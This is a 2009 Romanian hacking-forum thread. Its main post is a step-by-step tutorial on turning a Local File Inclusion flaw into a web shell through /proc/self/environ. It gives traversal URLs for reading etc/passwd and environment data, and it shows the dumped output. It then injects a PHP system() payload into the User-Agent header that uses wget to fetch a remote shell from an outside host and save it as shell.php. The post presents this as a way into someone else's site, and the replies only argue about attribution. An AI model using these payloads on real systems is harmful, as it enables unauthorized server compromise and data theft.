Shell prin LFI

ZeroCold · September 26, 2009

Shell prin LFI - metoda proc/self/environ

1 - Introducere

2 - Descoperire LFI

3 - Verificam daca proc/self/environ e accesibil

4 - Injectare cod malitios

5 - Acces la shell

6 - Multumiri

>> 1 - Introducere

In acestu tutorial va voi arata cum sa obtineti un shell pe un site folosindu-va de Local File Inclusion si

injectand cod malitios in proc/self/environ.Este un tutorial care explica totul pas cu pas.

>> 2 - Descoperire LFI

- Acum sa gasim o un site vulnerabil la Local File Inclusion.Am gasit tinta,sa verificam

www.website.com/view.php?page=contact.php

- Acum sa inlocuim contact.php cu ../ si URL-ul va devenii

www.website.com/view.php?page=../

si avem o eroare.

Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on

line 1337

sanse mari sa avem o vulnerabilitate de tip Local File Inclusion.Sa trecem mai departe.

- Sa verificam daca putem accesa etc/passwd ca sa vedem daca este vulnerabil la Local File Inclusion.Sa face un request :

www.website.com/view.php?page=../../../etc/passwd

avem o eroare si fisierul etc/passwd nu este inclus.

Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line

1337

urcam cateva directorii

www.website.com/view.php?page=../../../../../etc/passwd

am inclus cu succes fisierul etc/passwd.

root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin test:x:13:30:test:/var/test:/sbin/nologin ftp:x:14:50:FTP
User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin

>> 3 - Verificam daca proc/self/environ e accesibil

- Acum sa vedem daca proc/self/environ este accesibil.O sa inlocuim etc/passwd cu proc/self/environ

www.website.com/view.php?page=../../../...lf/environ

Daca primiti ceva de genul

DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png,
image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac HTTP_HOST=www.website.com
HTTP_REFERER=http://www.website.com/index.php?view=../../../../../../etc/passwd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15
Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx
REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
SCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster@website.com
SERVER_NAME=www.website.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.website.com Port 80

proc/self/environ este accesibil.Daca primiti o pagina alba,o eroare inseamna ca nu este accesibil sau sistemul de operare este FreeBSD.

>> 4 - Injectare cod malitios

- Acum sa injectam codul nostru malitios in proc/self/environ.Cum putem face asta?Injectam codul in HTTP Header-ul User-Agent.

Folositi addon-ul Tamper Data pentru Firefox pentru a schimba User-Agent-ul.Porniti Tamper Data si faceti un request la URL-ul :

www.website.com/view.php?page=../../../ ... lf/environ

Alegeti Tamper si in campul User-Agent scrieti urmatorul cod :

<?system('wget hack-bay.com -O shell.php');?>

Apoi dati submit la request.

Comanda noastra va fi executata(o sa descarce un shell txt de la adresa

http://hack-bay.com/Shells/gny.txt]hack-bay.com

si il va salva ca shell.php in

directorul site-ului) prin intermediul functiei system(),si shell-ul nostru va fi creat.Daca nu merge,incercati exec() pentru ca system() poate fi

restrictionat pe server din php.ini

>> 5 - Acces la shell

- Acuma sa verificam daca codul nostru malitios a fost injectat cu succes.Sa vedem daca shell-ul este prezent.

www.website.com/shell.php

Shell-ul nostru este acolo.Injectia a fost efectuata cu succes.

Sursa: insecurity.ro ; Author: SirGod

Edited September 26, 2009 by ZeroCold

September 26, 2009

Foarte simplu.. ma duc sa imi i-au o paine!

Adso · September 26, 2009

http://rstcenter.com/forum/16425-shell-prin-lfi-metoda-proc-self-environ.rst

dRuNNNk · September 26, 2009

l-am mai vazut pe rst oricum e facut de sirgod

Adso · September 26, 2009

l-am mai vazut pe rst oricum e facut de sirgod

reply de 2 lei, nu ai sp nik defapt ai repetat ce am pus eu si sursa lui!

dRuNNNk · September 26, 2009

scuze nu m-am uitat ca ai scris si tu

ZeroCold · September 26, 2009

http://rstcenter.com/forum/16425-shell-prin-lfi-metoda-proc-self-environ.rst

pe ala nu l-am vazut, da oricum se observa mai asta de aici.

si...da, e facut de sirgod, am pus las sfarsit autor si sursa

Sign In

Shell prin LFI

Recommended Posts

ZeroCold

Link to comment

Share on other sites

Guest Praetorian

Link to comment

Share on other sites

Adso

Link to comment

Share on other sites

dRuNNNk

Link to comment

Share on other sites

Adso

Link to comment

Share on other sites

dRuNNNk

Link to comment

Share on other sites

ZeroCold

Link to comment

Share on other sites

Join the conversation

Browse

Activity

Pages